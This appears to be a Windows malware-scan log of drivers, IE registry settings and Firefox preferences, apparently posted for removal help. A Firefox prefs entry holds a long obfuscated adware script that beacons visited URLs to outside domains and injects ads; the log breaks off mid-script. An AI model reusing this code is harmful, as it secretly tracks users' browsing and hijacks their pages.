DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Stopped] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.1w1yYzYd3Bt0Hdq9.scode: "(function(){try{if(window.self.location.href.indexOf(\"rjCEqHaEpjwErHg7qHY8rHaHpda\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.self.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.hostname)){return;}}}catch(e){}try{var u=[[\"revenuewire.com/pcutilitiespro\",\"__ipm=\",\"=apapamam\",\"txtlnkusaolp00000800\",\"=admaven\",\"5386b_643c_\",\"=CONMHP&conlogo=CT3210127\",\"www.livegeekhelp.com/pop/\",\"?ctid=ct3330145\",\"?ctid=ct3330146\",\"?ctid=ct3330147\",\"?ctid=ct3330148\",\"?ctid=ct3330149\",\"if72ru4sdfsdfruh7fewui\",\"fghjktghndfgtssss\",\"form=u064ht&pc=u064\",\"source=45905810\",\"source=532d277e\",\"aro.com/ws/?source=6974b128\",\"esmoke.com/?isid=9949\",\"esmoke.com/?isid=9950\",\"esmoke.com/?isid=9951\",\"id=webpick_ot\",\"id=wbpk_ot\",\"hash=a4vxy8\",\"hash=m5g73j\",\"hash=hg7gja\",\"hash=fz61s5\",\"hash=1i5w2d\",\"hash=zndas3\",\"hash=b3qau4\",\"hash=ijeqe4\",\"duit&ptag=aa7aab832a2de41458bf&\",\"duit&ptag=a93f650ac0e6a4a4791f&\",\"duit&ptag=a79888693f6ca4634a6f\",\"duit&ptag=a359b17b6faa44e6b86f\",\"isid=mf245f633-e188-4162-b56a\",\"sid=meabfcf9a-556b-4c5c-8727\",\"isid=m8fbc22fe-ab08-464e-aa63\",\"uid=531364863_132823_4252277e\"],[/[\\?&]p=24039(&|$)/,/lll[a-zA-Z0-9]{11}00/,/#FA[-_]/,/bing\\.com[^p]+pc=.+/,/^http:\\/\\/sporty-glow\\.com\\//,/^http:\\/\\/game-trek\\.net\\//,/#(a652c|ld893)_/,/ressbar\\.com[^f]+fid=65017/,/^https?:\\/\\/([a-z0-9-]+\\.)*search\\.yahoo\\.com\\/yhs\\/.*[&?]hspart=webpick(&|$)/]];for(var i=0,a=u[0],l=a.length;i<l;i++){if((window.self.location.href+\"#\"+window.name).indexOf(a[i])>-1){(new Image).src = \"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1272&pid=2111&hid=17070091036678530380\";return;}}for(var j=0,a=u[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.href+\"#\"+window.name)){(new Image).src=\"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!=\"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[j])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1272&pid=2111&hid=17070091036678530380\";return;}}}catch(e){}try{(function(){var stngs = {attr_name:'s17070091036678530380',szy_domain:[\"senddownloadmy.com\",\"milkyboxrangeronline.net\"],ad_sizes:[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]],checkif:function(ifr){return (ifr.getAttribute('s17070091036678530380') || ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<<Y2;var Q={_keyStr:\"ABC\"+P+\"EFGHIJ\"+O+\"L\"+N+V+\"OP\"+M+\"RS\"+U+I+\"VW\"+T+L+\"Za\"+G+\"cd\"+s7S5.n7T+w+\"g\"+s7S5.s4T+F+\"jklmno\"+C+\"qrstuvw\"+S+\"y\"+R+B+\"123456\"+v+K+A+\"+/=\",encode:function(a){var b=(540,335)>=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<<s7S5.C7T,h>>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<<s7S5.V7T,s>>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a[b]);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e[b]&&void 0!==e[b]&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e[b]));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" \")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a<b},p2:function(a,b){return a>>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<<b},e4T:\"Co\",G7T:\"ch\",y2:function(a,b){return a|b},s4T:\"h\",i2:function(a,b){return a%b},C7T:4,Y7T:0,b2:function(a,b){return a|b},j7T:1,P2:function(a,b){return a<b},n7T:\"e\",f2:function(a,b){return a<b},B2:function(a,b){return a<b},A5:function(a,b){return a|b},X0:function(a,b){return a<b},U5:function(a,b){return a<\nb},m2:function(a,b){return a<b},z2:function(a,b){return a<b},A7T:\"r\",j4T:\"ar\",K2:function(a,b){return a|b},E7T:\"de\",K7T:15,N7T:\"a\",I0:function(a,b){return a<b},E0:function(){var a=function(a,b){var e=b&(352<(181,1206)?(93,65535):1268<=(197,48)?(70,24):(581,57));return((b-e)*a|((54,496)>=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n<l;n+=(22,78)<(311,193)?(334,4):6>(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)